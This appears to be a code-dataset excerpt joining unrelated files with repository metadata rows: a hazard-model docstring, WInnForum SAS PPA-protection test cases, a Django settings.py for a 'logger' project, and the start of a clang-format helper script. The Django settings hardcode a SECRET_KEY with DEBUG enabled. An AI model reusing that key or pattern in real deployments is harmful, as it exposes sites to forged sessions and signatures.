- CEUS SSC Hazard Input Document - Appendix H, page H-3
- CEUS SSC Final Report - Chapter 5, page 5-57
"""
def get_median_area(self, mag, rake):
"""
Calculates median area as ``10 ** (mag - 4.366)``. Rake is ignored.
"""
return 10 ** (mag - 4.366)
| agpl-3.0 | 1,652,192,583,937,348,000 | 33.948718 | 75 | 0.702128 | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | 1 | 30790 | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import logging
from concurrent.futures import ThreadPoolExecutor
import common_strings
from full_activity_dump_helper import getFullActivityDumpSasTestHarness, getFullActivityDumpSasUut
import sas
import sas_testcase
from sas_test_harness import SasTestHarnessServer, generateCbsdRecords, \
generatePpaRecords, generateCbsdReferenceId
import test_harness_objects
from util import winnforum_testcase, writeConfig, loadConfig, configurable_testcase, \
getRandomLatLongInPolygon, makePpaAndPalRecordsConsistent, \
addCbsdIdsToRequests, getCertFilename, getCertificateFingerprint, \
getFqdnLocalhost, getUnusedPort, json_load
from testcases.WINNF_FT_S_MCP_testcase import McpXprCommonTestcase
from reference_models.pre_iap_filtering import pre_iap_filtering
class PpaProtectionTestcase(McpXprCommonTestcase):
def setUp(self):
self._sas, self._sas_admin = sas.GetTestingSas()
self._sas_admin.Reset()
def tearDown(self):
self.ShutdownServers()
def generate_PPR_1_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.1. """
# Load PPA record
ppa_record = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
pal_record = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests
grant_request_1 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json_load(
os.path.join('testcases', 'testdata', 'grant_1.json'))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_3 = json_load(
os.path.join('testcases', 'testdata', 'grant_2.json'))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_4 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': []
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')
}]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_1_default_config)
def test_WINNF_FT_S_PPR_1(self, config_filename):
"""Single SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR1')
def generate_PPR_2_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.2. """
# Load PPA record
ppa_record = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
pal_record = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests with overlapping frequency range for all devices
grant_request_1 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json_load(
os.path.join('testcases', 'testdata', 'grant_1.json'))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3570000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3580000000
grant_request_3 = json_load(
os.path.join('testcases', 'testdata', 'grant_2.json'))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3590000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3600000000
grant_request_4 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3610000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3620000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
# SAS Test Harnesses configurations,
# Following configurations are for two SAS test harnesses
sas_test_harness_device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
sas_test_harness_device_1['fccId'] = "test_fcc_id_e"
sas_test_harness_device_1['userId'] = "test_user_id_e"
sas_test_harness_device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
sas_test_harness_device_2['fccId'] = "test_fcc_id_f"
sas_test_harness_device_2['userId'] = "test_user_id_f"
sas_test_harness_device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
sas_test_harness_device_3['fccId'] = "test_fcc_id_g"
sas_test_harness_device_3['userId'] = "test_user_id_g"
# Generate Cbsd FAD Records for SAS Test Harness 0
cbsd_fad_records_sas_test_harness_0 = generateCbsdRecords(
[sas_test_harness_device_1],
[[grant_request_1]]
)
# Generate Cbsd FAD Records for SAS Test Harness 1
cbsd_fad_records_sas_test_harness_1 = generateCbsdRecords(
[sas_test_harness_device_2, sas_test_harness_device_3],
[[grant_request_2], [grant_request_3]]
)
# Generate SAS Test Harnesses dump records
dump_records_sas_test_harness_0 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_0
}
dump_records_sas_test_harness_1 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_1
}
# SAS Test Harnesses configuration
sas_test_harness_0_config = {
'sasTestHarnessName': 'SAS-TH-1',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas.cert'),
'serverKey': getCertFilename('sas.key'),
'caCert': getCertFilename('ca.cert')
}
sas_test_harness_1_config = {
'sasTestHarnessName': 'SAS-TH-2',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas_1.cert'),
'serverKey': getCertFilename('sas_1.key'),
'caCert': getCertFilename('ca.cert')
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': [dump_records_sas_test_harness_0,
dump_records_sas_test_harness_1]
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [sas_test_harness_0_config,
sas_test_harness_1_config],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')}
]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_2_default_config)
def test_WINNF_FT_S_PPR_2(self, config_filename):
"""Multiple SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR2')
def generate_PPR_3_default_config(self, filename):
"""High-level description of the default config:
SAS UUT has devices B, D; all of which have a PAL grant.
SAS TH has devices A, C, E, all of which have a PAL grant.
SAS UUT has one PPA, with devices B and D on the cluster list.
SAS TH has one PPA, with devices A, C, and E on the cluster list.
The PPAs derive from different but adjacent PALs.
Both PPAs are on 3620-3630 MHz, as are all grants.
"""
# Load Devices
device_a = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
device_a['installationParam']['latitude'] = 38.842176
device_a['installationParam']['longitude'] = -97.092863
device_b = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
device_b['installationParam']['latitude'] = 38.845323113
device_b['installationParam']['longitude'] = -97.15514587
device_b['installationParam']['antennaBeamwidth'] = 0
device_b['installationParam']['antennaDowntilt'] = 0
device_c = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
device_c['installationParam']['latitude'] = 38.816782
device_c['installationParam']['longitude'] = -97.102965
device_d = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
device_d['installationParam']['latitude'] = 38.846125
device_d['installationParam']['longitude'] = -97.156184
device_d['installationParam']['antennaBeamwidth'] = 0
device_d['installationParam']['antennaDowntilt'] = 0
device_e = json_load(
os.path.join('testcases', 'testdata', 'device_e.json'))
device_e['installationParam']['latitude'] = 38.761748
device_e['installationParam']['longitude'] = -97.118459
# Pre-load conditionals and remove REG-conditional fields from registration
# requests.
conditional_keys = [
'cbsdCategory', 'fccId', 'cbsdSerialNumber', 'airInterface',
'installationParam', 'measCapability'
]
reg_conditional_keys = [
'cbsdCategory', 'airInterface', 'installationParam', 'measCapability'
]
conditionals_b = {key: device_b[key] for key in conditional_keys}
device_b = {
key: device_b[key]
for key in device_b
if key not in reg_conditional_keys
}
conditionals_d = {key: device_d[key] for key in conditional_keys}
device_d = {
key: device_d[key]
for key in device_d
if key not in reg_conditional_keys
}
# Load grant requests (default is 3620-3630).
grant_a = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_b = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_b['operationParam']['maxEirp'] = 30
grant_c = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_d = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_d['operationParam']['maxEirp'] = 30
grant_e = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
# CBSDs in SAS UUT.
domain_proxy = {
'registrationRequests': [device_b, device_d],
'grantRequests': [grant_b, grant_d],
'conditionalRegistrationData': [conditionals_b, conditionals_d],
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}
# One PPA in SAS UUT.
pal_low_frequency = 3620000000
pal_high_frequency = 3630000000
pal_record_0 = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
ppa_record_0 = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
ppa_record_0['zone']['features'][0]['geometry']['coordinates'] = [[[
-97.155, 38.75
], [-97.155, 38.85], [-97.165, 38.85], [-97.165, 38.75], [-97.155, 38.75]]]
ppa_record_0, pal_records_0 = makePpaAndPalRecordsConsistent(
ppa_record_0, [pal_record_0], pal_low_frequency, pal_high_frequency,
'test_user_1')
device_b['userId'] = 'test_user_1'
device_d['userId'] = 'test_user_1'
ppa_cluster_list = [0, 1]
# One PPA in the peer SAS test harness.
pal_record_1 = json_load(
os.path.join('testcases', 'testdata', 'pal_record_1.json'))
pal_record_1['fipsCode'] = 20041084500
ppa_record_1 = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_1.json'))
ppa_record_1['zone']['features'][0]['geometry']['coordinates'] = [[[
-97.145, 38.85
], [-97.145, 38.75], [-97.05, 38.75], [-97.05, 38.85], [-97.145, 38.85]]]
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record_1, [pal_record_1], pal_low_frequency, pal_high_frequency,
'test_user_2')
# Generate FAD records.
cbsd_records = [device_a, device_c, device_e]
# Create CBSD reference IDs.
cbsd_reference_id_a = generateCbsdReferenceId(device_a['fccId'],
device_a['cbsdSerialNumber'])
cbsd_reference_id_c = generateCbsdReferenceId(device_c['fccId'],
device_c['cbsdSerialNumber'])
cbsd_reference_id_e = generateCbsdReferenceId(device_e['fccId'],
device_e['cbsdSerialNumber'])
cbsd_reference_ids = [[
cbsd_reference_id_a, cbsd_reference_id_c, cbsd_reference_id_e
]]
grant_record_list = [[grant_a], [grant_c], [grant_e]]
cbsd_records = generateCbsdRecords(cbsd_records, grant_record_list)
for cbsd in cbsd_records:
for grant in cbsd['grants']:
grant['channelType'] = 'PAL'
# Create records.
sas_harness_dump_records = {
'cbsdRecords': cbsd_records,
'ppaRecords': generatePpaRecords([ppa_record_1], cbsd_reference_ids),
}
# SAS test harness configuration.
sas_harness_config = {
'sasTestHarnessName': 'SAS-TH-1',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas.cert'),
'serverKey': getCertFilename('sas.key'),
'caCert': 'certs/ca.cert'
}
config = {
'domainProxy':
domain_proxy, # Includes registration and grant requests.
'ppaRecord': ppa_record_0, # PPA in SAS UUT.
'ppaClusterList':
ppa_cluster_list, # Same format and semantics as SIQ.12.
'palRecords': [pal_records_0[0],
pal_records_1[0]], # PALs for both PPAs.
'sasTestHarnessDumpRecords':
sas_harness_dump_records, # CBSDs and one PPA.
'sasTestHarnessConfig':
sas_harness_config, # Just the config, no records.
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_3_default_config)
def test_WINNF_FT_S_PPR_3(self, config_filename):
config = loadConfig(config_filename)
# Light config checking.
self.assertValidConfig(
config, {
'domainProxy': dict,
'ppaRecord': dict,
'ppaClusterList': list,
'palRecords': list,
'sasTestHarnessDumpRecords': dict,
'sasTestHarnessConfig': dict
})
self.assertEqual(
len(config['sasTestHarnessDumpRecords']['ppaRecords']), 1,
'Only one PPA is supported.')
# Make sure ID formats are correct.
ppa = config['sasTestHarnessDumpRecords']['ppaRecords'][0]
self.assertGreater(
len(ppa['ppaInfo']['cbsdReferenceId']), 0,
'Must have at least one ID on the cluster list.')
for cbsd_ref_id in ppa['ppaInfo']['cbsdReferenceId']:
self.assertFalse(
cbsd_ref_id.startswith('cbsd/'),
'IDs in the cluster list should not start with "cbsd/".')
for cbsd in config['sasTestHarnessDumpRecords']['cbsdRecords']:
self.assertTrue(cbsd['id'].startswith('cbsd/'),
'IDs of individual CBSDs must start with "cbsd/".')
# Initialize test-wide variables, and state variables.
self.config = config
self.active_dpas = []
self.sas_test_harness_objects = []
self.domain_proxy_objects = []
self.protected_entity_records = {}
self.num_peer_sases = 1
self.cpas_executor = ThreadPoolExecutor(max_workers=1)
self.agg_interf_check_executor = ThreadPoolExecutor(max_workers=1)
self.sas_uut_fad = None
self.test_harness_fads = [] # List for consistency with MCP code.
self.all_dpa_checks_succeeded = True
# Notify SAS UUT that a peer SAS exists (and start the SAS server)
logging.info('Step 1: activate one SAS test harness and notify SAS UUT.')
test_harness = config['sasTestHarnessConfig']
logging.info('Creating SAS TH with config %s', test_harness)
# Initialize SAS Test Harness Server instance to dump FAD records
sas_test_harness_object = SasTestHarnessServer(
test_harness['sasTestHarnessName'], test_harness['hostName'],
test_harness['port'], test_harness['serverCert'],
test_harness['serverKey'], test_harness['caCert'])
self.InjectTestHarnessFccIds(
config['sasTestHarnessDumpRecords']['cbsdRecords'])
sas_test_harness_dump_records = [
config['sasTestHarnessDumpRecords']['cbsdRecords'],
config['sasTestHarnessDumpRecords']['ppaRecords']
]
sas_test_harness_object.writeFadRecords(sas_test_harness_dump_records)
# Start the server
sas_test_harness_object.start()
# Inform SAS UUT about SAS Test Harness.
certificate_hash = getCertificateFingerprint(test_harness['serverCert'])
self._sas_admin.InjectPeerSas({'certificateHash': certificate_hash,
'url': sas_test_harness_object.getBaseUrl()})
# Store required info in the test harness.
self.fad_cert = test_harness['serverCert']
self.fad_key = test_harness['serverKey']
self.sas_test_harness_objects.append(sas_test_harness_object)
# Extract PPA record from peer SAS and add to local protected entities.
peer_sas_ppa = config['sasTestHarnessDumpRecords']['ppaRecords'][0]
# The ID for each CBSD's record is of the format "cbsd/$REFERENCE_ID". The
# IDs on the cluster list are of the format "$REFERENCE_ID". Here we prepend
# "cbsd/" so that the values will be correctly matched in the zone purge
# reference model.
cluster_list = peer_sas_ppa['ppaInfo']['cbsdReferenceId']
for i in range(len(cluster_list)):
cluster_list[i] = 'cbsd/%s' % cluster_list[i]
self.protected_entity_records['ppaRecords'] = [peer_sas_ppa]
# Inject all PALs (used by SAS UUT PPA and peer SAS PPA)
logging.info('Step 2: inject PAL records.')
for index, pal_record in enumerate(config['palRecords']):
try:
logging.info('Injecting PAL record #%d', index)
self._sas_admin.InjectPalDatabaseRecord(pal_record)
except Exception:
logging.error(common_strings.CONFIG_ERROR_SUSPECTED)
raise
self.protected_entity_records['palRecords'] = config['palRecords']
# Register, inject PPA, and request grants.
logging.info('Steps 3 - 5: register, inject PPA, request grants.')
domain_proxy_config = config['domainProxy']
domain_proxy = test_harness_objects.DomainProxy(self,
domain_proxy_config['cert'],
domain_proxy_config['key'])
self.domain_proxy_objects.append(domain_proxy)
(sas_uut_ppa_record_with_cbsd_ids, sas_uut_ppa_record_with_reference_ids
) = domain_proxy.registerCbsdsAndRequestGrantsWithPpa(
domain_proxy_config['registrationRequests'],
domain_proxy_config['grantRequests'], config['ppaRecord'],
config['ppaClusterList'],
domain_proxy_config['conditionalRegistrationData'])
# Make sure SAS UUT's PPA is also checked for protection.
# At this point, we use the "with reference IDs" version because the pre-IAP
# filtering code compares against the CBSD reference ID in the FAD.
self.protected_entity_records['ppaRecords'].append(
sas_uut_ppa_record_with_reference_ids)
# FAD exchange.
logging.info('Step 6 + 7: FAD exchange.')
self.sas_uut_fad = getFullActivityDumpSasUut(self._sas, self._sas_admin,
self.fad_cert, self.fad_key)
self.test_harness_fads.append(
getFullActivityDumpSasTestHarness(
self.sas_test_harness_objects[0].getSasTestHarnessInterface()))
# Trigger CPAS in SAS UUT, and wait until completion.
logging.info('Step 8: trigger CPAS.')
self.cpas = self.cpas_executor.submit(
self.TriggerDailyActivitiesImmediatelyAndWaitUntilComplete)
logging.info('Step 9: execute IAP reference model.')
# Pre-IAP filtering.
pre_iap_filtering.preIapReferenceModel(self.protected_entity_records,
self.sas_uut_fad,
self.test_harness_fads)
# IAP reference model.
self.performIap()
logging.info('Waiting for CPAS to complete (started in step 8).')
self.cpas.result()
logging.info('CPAS started in step 8 complete.')
# Heartbeat, relinquish, grant, heartbeat
logging.info('Steps 10 - 13: heartbeat, relinquish, grant, heartbeat.')
domain_proxy.performHeartbeatAndUpdateGrants()
# Aggregate interference check
logging.info(
'Step 14 and CHECK: calculating and checking aggregate interference.')
# Before performing this check, we need to update the cluster list of SAS
# UUT's PPA to use the CBSD IDs -- rather than reference IDs -- since this
# is what the function getAuthorizedGrantsFromDomainProxies() expects. Note
# that we must keep the indexing the same since
# self.ppa_ap_iap_ref_values_list assumes consistent ordering of protected
# entities.
self.protected_entity_records['ppaRecords'][
1] = sas_uut_ppa_record_with_cbsd_ids
self.performIapAndDpaChecks()
| apache-2.0 | 6,128,459,033,703,096,000 | 41.120383 | 98 | 0.64102 | false |
h4/fuit-webdev | projects/logger/logger/settings.py | 1 | 5341 | # Django settings for logger project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_ROOT = os.path.dirname(os.path.realpath(__file__))
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ocvuca%yvz(24m0kl%9v9fa08q1w+k*9qz_5wu2efclb04bb3o'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'logger.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'logger.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, '../templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'testhttp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| mit | 1,071,628,346,005,622,400 | 33.458065 | 101 | 0.681333 | false |
daniestevez/gr-satellites | tools/clang_format.py | 1 | 26734 | #!/usr/bin/env python
# Copyright (C) 2015,2016 MongoDB Inc.
# Copyright (C) 2018 Free Software Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A script that provides:
1. Validates clang-format is the right version.
2. Has support for checking which files are to be checked.
3. Supports validating and updating a set of files to the right coding style.
"""
import queue
import difflib
import glob
import itertools
import os
import re
import subprocess
from subprocess import check_output, CalledProcessError
import sys
import threading
import time
from distutils import spawn
